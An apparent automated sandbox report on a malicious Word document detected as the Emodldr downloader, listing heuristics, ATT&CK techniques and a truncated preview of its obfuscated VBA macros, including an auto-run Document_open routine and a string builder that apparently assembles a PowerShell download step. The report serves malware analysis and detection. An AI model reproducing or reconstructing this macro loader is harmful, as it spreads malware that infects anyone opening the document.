MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands. The 'Document_Open' macro suggests the malicious code executes automatically upon opening the document. The ClamAV detection further confirms its malicious nature, identifying it as Emodldr, a known downloader family. The VBA script is heavily obfuscated, but the presence of the Shell() call strongly suggests it is designed to download and execute a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42827 bytes |
SHA-256: 2c0dc1e20fe1bd441cdc259d21e6508bef9c537453b1b9bf94536e9fcb3a3d3a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SoBcHZvRo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MQTMv(LparOD)
iltCI = 98511 - CDbl(68162 / Int(78040) - 30709 / Round(15114 / CSng(63256 - CByte(78855)))) * iuOqr * Fix(6838) - 4380 / CByte(QrGiVG) / jQjcsh - CBool(5514) / WqSQC / Atn(27750)
End Sub
Sub ImXfzQ(jAKBDS)
nTnsEF = 98635 - CDbl(52991 / Int(8990) - 94047 / Round(66360 / CSng(60678 - CByte(85444)))) * zYnzkU * Fix(67206) - 37969 / CByte(qHOIj) / RqikIi - CBool(45641) / XwJwjh / Atn(51719)
UYjkcX = 4370 - CDbl(37014 / Int(95714) - 21217 / Round(38418 / CSng(15459 - CByte(93343)))) * pwSwnG * Fix(7544) - 90296 / CByte(IbsPAa) / Cmkum - CBool(81376) / wDuoL / Atn(74668)
OPjmIM = 58769 - CDbl(70505 / Int(89305) - 39401 / Round(85861 / CSng(48464 - CByte(77216)))) * IjHBsa * Fix(16879) - 65063 / CByte(CwzYV) / sSsImu - CBool(23288) / drOtR / Atn(84049)
End Sub
Sub BNCzo(mmSMo)
rjnJnJ = 84117 - CDbl(2830 / Int(4448) - 140 / Round(32835 / CSng(2722 - CByte(62663)))) * aiJihr * Fix(81013) - 15366 / CByte(kzbhZ) / fZvwN - CBool(38812) / piakZq / Atn(25911)
wAQst = 15779 - CDbl(55105 / Int(77906) - 60674 / Round(94954 / CSng(82343 - CByte(69116)))) * DMMbSv * Fix(43730) - 50556 / CByte(DTczo) / DzRzuz - CBool(77102) / KpjwCl / Atn(30610)
End Sub
Private Sub Document_open()
On Error Resume Next
WkzmV = 27397 - CDbl(15708 / Int(14732) - 90781 / Round(82180 / CSng(52071 - CByte(52001)))) * zQvTAk * Fix(66293) - 61635 / CByte(pfPPBm) / wTpFCw - CBool(84326) / CGpoJ / Atn(9012)
Application.Run YNwMY + "uPwzOlpujUVu" + iCAhUf, RXFMVV + MsFjFZjDfboS + WmVvAY
QuvtWm = 72388 - CDbl(14226 / Int(3847) - 32461 / Round(78523 / CSng(26735 - CByte(2665)))) * RoYhR * Fix(94292) - 67000 / CByte(AdTnGj) / rDMAoO - CBool(14186) / nwtJJ / Atn(40870)
End Sub
Sub XHUjFz(NjbMlu)
ZifEU = 19793 - CDbl(25027 / Int(54853) - 25255 / Round(24481 / CSng(7079 - CByte(19878)))) * kjYnYK * Fix(21316) - 10481 / CByte(TZbpu) / cZbcMm - CBool(26805) / NEoKc / Atn(90520)
HcuOMi = 21807 - CDbl(75591 / Int(76879) - 52484 / Round(68307 / CSng(24720 - CByte(26427)))) * GdfPW * Fix(99190) - 76006 / CByte(azwWTK) / kzjKRL - CBool(94005) / ahMRmn / Atn(2939)
ZAAHbJ = 90925 - CDbl(10517 / Int(91330) - 12985 / Round(43585 / CSng(3840 - CByte(94833)))) * qKADD * Fix(54154) - 931 / CByte(vDJwE) / KhBzZU - CBool(43489) / SDIaD / Atn(56871)
End Sub
Sub LpujJ(BQijZc)
EzziE = 25928 - CDbl(90723 / Int(26003) - 10635 / Round(48719 / CSng(55109 - CByte(55788)))) * UswvdY * Fix(44059) - 76136 / CByte(OOMvqI) / SNzrz - CBool(34306) / FdWqi / Atn(2633)
End Sub
Sub PSGOX(TmGBF)
TjjSIX = 73970 - CDbl(93327 / Int(74521) - 22592 / Round(55164 / CSng(72075 - CByte(91884)))) * WrSGh * Fix(77911) - 73509 / CByte(wwGjSz) / jGwlPw - CBool(73541) / LNTvE / Atn(36370)
pUSVm = 55583 - CDbl(38925 / Int(398) - 36770 / Round(33374 / CSng(95554 - CByte(78509)))) * nLbEnz * Fix(12932) - 9248 / CByte(zjEkUH) / OshMuG - CBool(71904) / zMULG / Atn(61149)
End Sub
Attribute VB_Name = "RJBjzmOIFM"
Sub LVmRCI(HEYQc)
jaNHaf = 90256 - CDbl(96288 / Int(96102) - 60579 / Round(28988 / CSng(90278 - CByte(66770)))) * IGAjcz * Fix(91213) - 90183 / CByte(cjKLw) / bvBjLD - CBool(48000) / HhZRB / Atn(26558)
End Sub
Function MsFjFZjDfboS()
On Error Resume Next
NKGzNb = 38657 - CDbl(60735 / Int(86833) - 75701 / Round(40796 / CSng(59621 - CByte(67504)))) * swUtK * Fix(67342) - 98748 / CByte(MRsUh) / nNsVr - CBool(30128) / jNGpqP / Atn(57415)
wQJRvXIJbM = TQwJqV("YhIzWsnOWsdX4+dX4+dX4+dX4OWseOdX4+dX4WdX4+dX4sdX4+dX4+dX4+dX4OWdX4+dX4sw-objecOdXvuP", GTOrHj - GTOrHj + 5 + GTOrHj - GTOrHj, GTOrHj - GTOrHj + 77 + GTOrHj - GTOrHj)
aDMfS = 93600 - CDbl(97886 / Int(27852) - 39958 / Round(44674 / CSng(15015 - CByte(85317)))) * zoHsuL * Fix(84866) - 60729 / CByte(znTPLj) / EUTVJ - CBool(71915) / jpPMo / Atn(98258)
UbSXi = 63770 - CDbl(30721 / Int(9918) - 12699 / Round(91746 / CSng(32914 - CByte(11644))
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.